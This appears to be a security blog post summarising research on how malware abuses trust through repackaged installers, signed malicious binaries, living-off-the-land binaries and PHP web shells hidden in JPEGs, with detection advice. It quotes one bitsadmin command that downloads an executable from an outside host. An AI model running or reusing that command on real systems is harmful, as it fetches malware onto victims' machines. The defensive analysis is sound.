How Malware Authors Weaponize Trust to Bypass Modern Defenses

TLDR: Malware authors are increasingly embedding malicious payloads within legitimate software installers and using stolen digital certificates to evade detection. This research demonstrates how attackers abuse trusted domains and common system binaries to maintain persistence and execute code. Security researchers and pentesters should prioritize monitoring for suspicious file signatures and anomalous behavior from trusted processes to identify these stealthy campaigns.

Security teams spend millions on endpoint detection and response tools, yet the most effective way to bypass these systems remains remarkably simple: stop acting like a threat and start acting like a trusted application. Recent research presented at Black Hat 2023 highlights a massive shift in how malware authors operate. Instead of building custom, easily flagged infrastructure, they are hijacking the reputation of legitimate software. By embedding malicious code into installers for popular applications like ProtonVPN or 7-Zip, attackers ensure their payloads are treated as trusted entities by both users and security software.

The Mechanics of Abused Trust

Attackers have moved beyond simple obfuscation. The current trend involves a multi-layered approach to deception. First, they target the supply chain by creating "cracked" or "repackaged" versions of legitimate software. These installers often contain the original, functional application, but they also include a hidden, malicious component.

One of the most effective techniques involves abusing Code Signing. When a binary is signed with a valid certificate from a reputable vendor, many security products automatically assign it a higher trust score. The research identified over 1.1 million suspicious samples that were signed with valid certificates at the time of submission. Even after these certificates are revoked, the malware often remains undetected because the initial trust was already established.

Living off the Land

Once the initial payload is executed, the malware rarely attempts to download a secondary stage from a suspicious, unknown domain. Instead, it uses LOLBins—legitimate system binaries—to perform its tasks. By using tools already present on the Windows operating system, the malware avoids triggering alerts that would occur if it attempted to inject code into memory or spawn unknown processes.

For example, an attacker might use bitsadmin to download a secondary payload or msiexec to install a malicious package. These commands are common in administrative scripts, making them difficult to distinguish from normal system activity.

bitsadmin /transfer myDownloadJob /download /priority normal http://teststaff.ru/tmp.exe %SAMPLEPATH%\%username%.exe

This command, while simple, is highly effective. Because bitsadmin is a signed Microsoft binary, it is rarely blocked by default security policies. When combined with a legitimate installer, the malicious activity blends into the noise of daily system operations.

Detecting Deception in Your Environment

For a pentester or a bug bounty hunter, the key to finding these threats lies in identifying the discrepancy between the expected behavior of a trusted application and its actual execution. If you are performing a red team engagement, you can test the efficacy of a client's detection capabilities by attempting to execute a signed, but malicious, binary.

The research suggests that defenders should focus on the following indicators:

• Certificate Mismatches: Monitor for binaries signed by certificates that do not match the expected vendor or have been recently revoked.
• Anomalous Parent-Child Relationships: A legitimate installer like setup.exe should not be spawning taskkill or bitsadmin to perform network operations.
• Favicon and Icon Analysis: Attackers often use visually similar icons to mimic popular applications. Using VirusTotal queries, you can hunt for files that share the same visual hash as known legitimate software but have different file hashes.

main_icon_dhash:f09ea26161a2ccf0

This query allows you to identify files that share a visual identity with a target application. If you find a file that matches this hash but has a high detection rate from antivirus engines, you have likely found a malicious repackaged installer.

The Reality of Modern Persistence

Web shells remain a primary method for maintaining persistence on compromised servers. The research uncovered a significant number of JPEG files containing embedded PHP code. These files are often uploaded to legitimate government or corporate websites that have vulnerable content management systems. By hiding the malicious code within a file that appears to be a standard image, attackers can bypass basic file-type filtering.

The impact of these techniques is profound. When an attacker successfully compromises a trusted domain, they gain a foothold that is difficult to remove. They can serve malicious payloads to unsuspecting users, host command-and-control infrastructure, and maintain access for months without being detected.

Defenders must move away from relying solely on file reputation. A file being "signed" or "hosted on a popular domain" is no longer a guarantee of safety. Instead, security operations must shift toward behavioral analysis. If a process is performing actions that fall outside its normal scope—such as a browser installer making unexpected network connections or a document reader spawning a command shell—it should be treated as a potential compromise. The era of trusting binaries based on their metadata is over. Start looking at what the code actually does, not just who signed it.